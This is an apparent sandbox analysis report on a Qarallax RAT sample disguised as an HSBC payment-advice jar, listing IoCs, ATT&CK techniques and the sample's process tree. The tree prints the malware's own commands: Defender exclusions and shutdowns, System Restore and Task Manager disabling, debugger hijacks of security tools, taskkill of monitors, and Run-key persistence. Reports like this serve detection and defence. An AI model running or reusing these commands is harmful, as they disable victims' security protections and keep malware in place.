qarallax | 0b81ff2995706809c70836bc77057db0e6b395c39f8e4623d354efcaa82f7480

Analysis

max time kernel
149s
max time network
143s
platform
windows7_x64
resource
win7v200722
submitted
25-08-2020 10:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Payment Advice Hsbc_pdf.jar
Size

411KB
MD5

f202f81ea024be0ef950ff369bdf4087
SHA1

4dbbfe69123c4d8348e61f06f1b6c78e6e685fca
SHA256

0b81ff2995706809c70836bc77057db0e6b395c39f8e4623d354efcaa82f7480
SHA512

99eff56986a915ca8ed5d301484e24b82d35745e17bfecf275e38705cb4e95f4a60b06930f2d01157905f843971f01b03613b0c79e92dc78ab269fe499271c54

Score

10^/10

trojan qarallax persistence evasion

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\rffmkGjZJz1739107710134319911.xml	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Loads dropped DLL 1 IoCs

Processes:

java.exe

pid process

1056 java.exe

pid	process
1056	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

java.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

Processes:

attrib.exeattrib.exejava.exe

description	ioc	process
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\ujTBR\Desktop.ini	java.exe
File created	C:\Users\Admin\ujTBR\Desktop.ini	java.exe

Drops file in System32 directory 2 IoCs

Processes:

java.exe

description ioc process

File created C:\Windows\System32\rdBpT java.exe
File opened for modification C:\Windows\System32\rdBpT java.exe

description	ioc	process
File created	C:\Windows\System32\rdBpT	java.exe
File opened for modification	C:\Windows\System32\rdBpT	java.exe

Kills process with taskkill 19 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
108	taskkill.exe
1644	taskkill.exe
1612	taskkill.exe
1852	taskkill.exe
1572	taskkill.exe
1596	taskkill.exe
112	taskkill.exe
1832	taskkill.exe
1840	taskkill.exe
1560	taskkill.exe
1476	taskkill.exe
584	taskkill.exe
1332	taskkill.exe
2020	taskkill.exe
2020	taskkill.exe
376	taskkill.exe
1920	taskkill.exe
1996	taskkill.exe
1084	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1896 powershell.exe
1896 powershell.exe

pid	process
1896	powershell.exe
1896	powershell.exe

Suspicious use of AdjustPrivilegeToken 100 IoCs

Processes:

WMIC.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1628	WMIC.exe
Token: SeSecurityPrivilege	1628	WMIC.exe
Token: SeTakeOwnershipPrivilege	1628	WMIC.exe
Token: SeLoadDriverPrivilege	1628	WMIC.exe
Token: SeSystemProfilePrivilege	1628	WMIC.exe
Token: SeSystemtimePrivilege	1628	WMIC.exe
Token: SeProfSingleProcessPrivilege	1628	WMIC.exe
Token: SeIncBasePriorityPrivilege	1628	WMIC.exe
Token: SeCreatePagefilePrivilege	1628	WMIC.exe
Token: SeBackupPrivilege	1628	WMIC.exe
Token: SeRestorePrivilege	1628	WMIC.exe
Token: SeShutdownPrivilege	1628	WMIC.exe
Token: SeDebugPrivilege	1628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1628	WMIC.exe
Token: SeRemoteShutdownPrivilege	1628	WMIC.exe
Token: SeUndockPrivilege	1628	WMIC.exe
Token: SeManageVolumePrivilege	1628	WMIC.exe
Token: 33	1628	WMIC.exe
Token: 34	1628	WMIC.exe
Token: 35	1628	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1628	WMIC.exe
Token: SeSecurityPrivilege	1628	WMIC.exe
Token: SeTakeOwnershipPrivilege	1628	WMIC.exe
Token: SeLoadDriverPrivilege	1628	WMIC.exe
Token: SeSystemProfilePrivilege	1628	WMIC.exe
Token: SeSystemtimePrivilege	1628	WMIC.exe
Token: SeProfSingleProcessPrivilege	1628	WMIC.exe
Token: SeIncBasePriorityPrivilege	1628	WMIC.exe
Token: SeCreatePagefilePrivilege	1628	WMIC.exe
Token: SeBackupPrivilege	1628	WMIC.exe
Token: SeRestorePrivilege	1628	WMIC.exe
Token: SeShutdownPrivilege	1628	WMIC.exe
Token: SeDebugPrivilege	1628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1628	WMIC.exe
Token: SeRemoteShutdownPrivilege	1628	WMIC.exe
Token: SeUndockPrivilege	1628	WMIC.exe
Token: SeManageVolumePrivilege	1628	WMIC.exe
Token: 33	1628	WMIC.exe
Token: 34	1628	WMIC.exe
Token: 35	1628	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1112	WMIC.exe
Token: SeSecurityPrivilege	1112	WMIC.exe
Token: SeTakeOwnershipPrivilege	1112	WMIC.exe
Token: SeLoadDriverPrivilege	1112	WMIC.exe
Token: SeSystemProfilePrivilege	1112	WMIC.exe
Token: SeSystemtimePrivilege	1112	WMIC.exe
Token: SeProfSingleProcessPrivilege	1112	WMIC.exe
Token: SeIncBasePriorityPrivilege	1112	WMIC.exe
Token: SeCreatePagefilePrivilege	1112	WMIC.exe
Token: SeBackupPrivilege	1112	WMIC.exe
Token: SeRestorePrivilege	1112	WMIC.exe
Token: SeShutdownPrivilege	1112	WMIC.exe
Token: SeDebugPrivilege	1112	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1112	WMIC.exe
Token: SeRemoteShutdownPrivilege	1112	WMIC.exe
Token: SeUndockPrivilege	1112	WMIC.exe
Token: SeManageVolumePrivilege	1112	WMIC.exe
Token: 33	1112	WMIC.exe
Token: 34	1112	WMIC.exe
Token: 35	1112	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1112	WMIC.exe
Token: SeSecurityPrivilege	1112	WMIC.exe
Token: SeTakeOwnershipPrivilege	1112	WMIC.exe
Token: SeLoadDriverPrivilege	1112	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

java.exe

pid process

1056 java.exe

pid	process
1056	java.exe

Suspicious use of WriteProcessMemory 798 IoCs

Processes:

java.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1056 wrote to memory of 108	1056	java.exe	cmd.exe
PID 1056 wrote to memory of 108	1056	java.exe	cmd.exe
PID 1056 wrote to memory of 108	1056	java.exe	cmd.exe
PID 1056 wrote to memory of 908	1056	java.exe	cmd.exe
PID 1056 wrote to memory of 908	1056	java.exe	cmd.exe
PID 1056 wrote to memory of 908	1056	java.exe	cmd.exe
PID 908 wrote to memory of 1628	908	cmd.exe	WMIC.exe
PID 908 wrote to memory of 1628	908	cmd.exe	WMIC.exe
PID 908 wrote to memory of 1628	908	cmd.exe	WMIC.exe
PID 1056 wrote to memory of 1120	1056	java.exe	cmd.exe
PID 1056 wrote to memory of 1120	1056	java.exe	cmd.exe
PID 1056 wrote to memory of 1120	1056	java.exe	cmd.exe
PID 1120 wrote to memory of 1112	1120	cmd.exe	WMIC.exe
PID 1120 wrote to memory of 1112	1120	cmd.exe	WMIC.exe
PID 1120 wrote to memory of 1112	1120	cmd.exe	WMIC.exe
PID 1056 wrote to memory of 1716	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1716	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1716	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1820	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1820	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1820	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1268	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1268	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1268	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1832	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1832	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1832	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1784	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1784	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1784	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1776	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1776	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1776	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1664	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1664	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1664	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1652	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1652	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1652	1056	java.exe	attrib.exe
PID 1056 wrote to memory of 1572	1056	java.exe	cmd.exe
PID 1056 wrote to memory of 1572	1056	java.exe	cmd.exe
PID 1056 wrote to memory of 1572	1056	java.exe	cmd.exe
PID 1056 wrote to memory of 1896	1056	java.exe	powershell.exe
PID 1056 wrote to memory of 1896	1056	java.exe	powershell.exe
PID 1056 wrote to memory of 1896	1056	java.exe	powershell.exe
PID 1056 wrote to memory of 1860	1056	java.exe	reg.exe
PID 1056 wrote to memory of 1860	1056	java.exe	reg.exe
PID 1056 wrote to memory of 1860	1056	java.exe	reg.exe
PID 1056 wrote to memory of 1864	1056	java.exe	reg.exe
PID 1056 wrote to memory of 1864	1056	java.exe	reg.exe
PID 1056 wrote to memory of 1864	1056	java.exe	reg.exe
PID 1056 wrote to memory of 1920	1056	java.exe	taskkill.exe
PID 1056 wrote to memory of 1920	1056	java.exe	taskkill.exe
PID 1056 wrote to memory of 1920	1056	java.exe	taskkill.exe
PID 1056 wrote to memory of 1944	1056	java.exe	reg.exe
PID 1056 wrote to memory of 1944	1056	java.exe	reg.exe
PID 1056 wrote to memory of 1944	1056	java.exe	reg.exe
PID 1572 wrote to memory of 1908	1572	cmd.exe	reg.exe
PID 1572 wrote to memory of 1908	1572	cmd.exe	reg.exe
PID 1572 wrote to memory of 1908	1572	cmd.exe	reg.exe
PID 1056 wrote to memory of 1984	1056	java.exe	reg.exe
PID 1056 wrote to memory of 1984	1056	java.exe	reg.exe
PID 1056 wrote to memory of 1984	1056	java.exe	reg.exe
PID 1056 wrote to memory of 2036	1056	java.exe	reg.exe

Views/modifies file attributes 1 TTPs 8 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1776 attrib.exe
1664 attrib.exe
1652 attrib.exe
1716 attrib.exe
1820 attrib.exe
1268 attrib.exe
1832 attrib.exe
1784 attrib.exe

pid	process
1776	attrib.exe
1664	attrib.exe
1652	attrib.exe
1716	attrib.exe
1820	attrib.exe
1268	attrib.exe
1832	attrib.exe
1784	attrib.exe

C:\Windows\system32\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\Payment Advice Hsbc_pdf.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1056
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:108
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:908
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1628
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1120
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1112
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:1716
- C:\Windows\system32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:1820
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1268
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1832
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1784
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1776
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1664
- C:\Windows\system32\attrib.exe
  attrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class
  2⤵
  - Views/modifies file attributes
  PID:1652
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1896
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1860
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:1864
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1920
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1944
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1984
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:2036
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:2028
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:376
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:576
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:760
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:2004
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1136
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1500
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:860
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:1076
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:112
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1060
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1100
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:1520
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:772
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1380
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:1800
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1796
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:1792
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1592
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:1568
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1340
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1996
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:796
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1812
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:536
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:824
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1268
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1608
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1060
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1084
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:1928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:1380
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:1488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:1336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:584
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:2020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:1612
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:2008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:1840
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:1628
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:1568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:744
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1716
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:1268
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:1264
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:1864
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:1944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:112
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:2036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
